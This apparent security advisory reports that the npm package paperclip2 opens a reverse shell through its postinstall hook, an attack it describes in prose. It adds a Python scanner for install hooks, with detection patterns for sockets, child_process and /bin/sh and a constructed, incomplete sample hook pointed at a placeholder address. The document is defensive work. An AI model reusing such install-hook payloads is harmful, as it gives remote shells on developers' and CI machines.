
MAL-2026-6755

Malicious code in paperclip2 (npm)

Details


## Source: amazon-inspector (b6fbcfc445b1a599943dac3ca0691633629c6804037b38fcf6113062f6add848)

package.json declares a postinstall lifecycle script that runs `node -e` code opening a TCP connection to 185.112.147.174:7007 and piping the socket to a spawned /bin/sh, giving the operator of that endpoint an interactive shell on the installer's machine. The package ships no other functionality: its sole effect on install is to establish this reverse shell. Any developer workstation or CI job running `npm install paperclip2` is compromised with arbitrary code execution as the invoking user.
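A defender-side check for the install-hook pattern described above, added here as an example and not part of the advisory or of the amazon-inspector source: it reads a package.json and flags lifecycle scripts that run inline `node -e` code referencing sockets or shell spawning. The sample manifests are constructed; the flagged one uses a documentation-range placeholder address and is deliberately incomplete.

```python
import json
import re

# Hooks that npm runs automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Inline evaluation of JS on the command line (`node -e` / `node --eval`).
INLINE_NODE = re.compile(r"\bnode\s+(-e|--eval)\b")

# Tokens that indicate network and shell activity inside an install hook,
# rather than a normal build step such as `node-gyp rebuild`.
SUSPICIOUS_TOKENS = (
    r"require\(.net.\)",
    r"require\(.child_process.\)",
    r"\.connect\(",
    r"\bspawn\(",
    r"/bin/sh",
    r"\.pipe\(",
)


def audit_lifecycle_scripts(package_json_text):
    """Return [(hook, [reasons])] for lifecycle scripts that look like an
    inline payload; an empty list means nothing suspicious was found."""
    scripts = json.loads(package_json_text).get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = []
        if INLINE_NODE.search(cmd):
            reasons.append("inline node -e code")
        reasons += [f"matches {p}" for p in SUSPICIOUS_TOKENS if re.search(p, cmd)]
        if reasons:
            findings.append((hook, reasons))
    return findings


# Constructed samples (not the real package): one benign native build hook,
# one hook shaped like the advisory's postinstall, with a placeholder target.
BENIGN_PACKAGE_JSON = json.dumps({"scripts": {"postinstall": "node-gyp rebuild"}})
SUSPECT_PACKAGE_JSON = json.dumps({"scripts": {
    "postinstall": "node -e \"require('net').connect(7007,'192.0.2.10');"
                   "require('child_process').spawn('/bin/sh')\"",
    "test": "node test.js",
}})

if __name__ == "__main__":
    for hook, reasons in audit_lifecycle_scripts(SUSPECT_PACKAGE_JSON):
        print(f"{hook}: {', '.join(reasons)}")
```

Run it against the package.json of each dependency in node_modules (or against a tarball before installing) to surface install hooks that deserve a manual look; a match is a prompt for review, not proof of malice.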


Affected packages

npm / paperclip2

No fixed version published yet for paperclip2 (npm). Pin to a known-safe version or switch to an alternative.
